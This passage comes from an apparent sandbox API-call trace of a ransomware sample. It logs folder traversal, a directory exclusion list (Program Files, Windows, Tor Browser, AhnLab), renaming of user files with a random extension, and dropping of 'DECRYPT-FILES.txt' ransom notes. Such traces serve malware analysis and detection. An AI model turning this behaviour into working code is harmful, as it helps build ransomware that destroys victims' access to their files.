16 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.167] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.167] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.167] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.167] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.167] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.167] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.167] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.167] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.167] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.167] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.167] lstrlenA (lpString="DELETEATOM") returned 10 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.168] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.168] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.168] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.168] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.168] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.168] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.168] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.168] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.168] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.168] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.168] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.168] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.168] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.168] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.168] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.168] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.168] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.168] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.168] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.168] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.169] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.169] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.169] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.169] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.169] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.169] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.169] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.169] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.169] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.169] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.169] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.169] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.169] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.169] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.169] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.169] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.169] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.169] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.169] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.170] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.170] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.170] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.170] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.170] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.170] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx") returned 59 [0084.170] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx.u7WV7B") returned 66 [0084.170] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mf7hbrwzhas09w.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mf7HbrwzhAs09W.pptx.u7WV7B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mf7hbrwzhas09w.pptx.u7wv7b"), dwFlags=0x0) returned 1 [0084.171] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.171] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.171] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.171] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0084.171] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0084.171] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0084.171] lstrcatW (in: lpString1="My Music", lpString2="\\" | out: lpString1="My Music\\") returned="My Music\\" [0084.171] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\" [0084.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Program Files") returned 0x0 [0084.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch=":\\Windows") returned 0x0 [0084.171] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Games\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\All Users") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="AhnLab") returned 0x0 [0084.172] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.172] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0084.172] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.172] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\jkbimi8.tmp") returned 61 [0084.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.172] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0084.172] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.172] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\DECRYPT-FILES.txt") returned 67 [0084.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.173] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.174] CloseHandle (hObject=0x414) returned 1 [0084.174] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0084.174] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*" [0084.174] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0x7bf3e5c0, ftLastWriteTime.dwHighDateTime=0x1d4ceae, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx", cAlternateFileName="苟盅ꦌ썮ϲ")) returned 0xffffffff [0084.174] CloseHandle (hObject=0x410) returned 1 [0084.174] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0084.174] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0084.175] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0084.175] lstrcatW (in: lpString1="My Pictures", lpString2="\\" | out: lpString1="My Pictures\\") returned="My Pictures\\" [0084.175] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Program Files") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch=":\\Windows") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Games\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\All Users") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="AhnLab") returned 0x0 [0084.175] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0084.175] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.175] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\jkbimi8.tmp") returned 64 [0084.175] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.175] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0084.175] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.175] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\DECRYPT-FILES.txt") returned 70 [0084.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.176] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.177] CloseHandle (hObject=0x414) returned 1 [0084.177] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0084.177] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*" [0084.177] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0x7bf3e5c0, ftLastWriteTime.dwHighDateTime=0x1d4ceae, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx", cAlternateFileName="苟盅ꦌ썮ϲ")) returned 0xffffffff [0084.177] CloseHandle (hObject=0x410) returned 1 [0084.177] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0084.177] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0084.177] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0084.177] lstrcatW (in: lpString1="My Shapes", lpString2="\\" | out: lpString1="My Shapes\\") returned="My Shapes\\" [0084.177] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Program Files") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch=":\\Windows") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Games\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.177] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\User 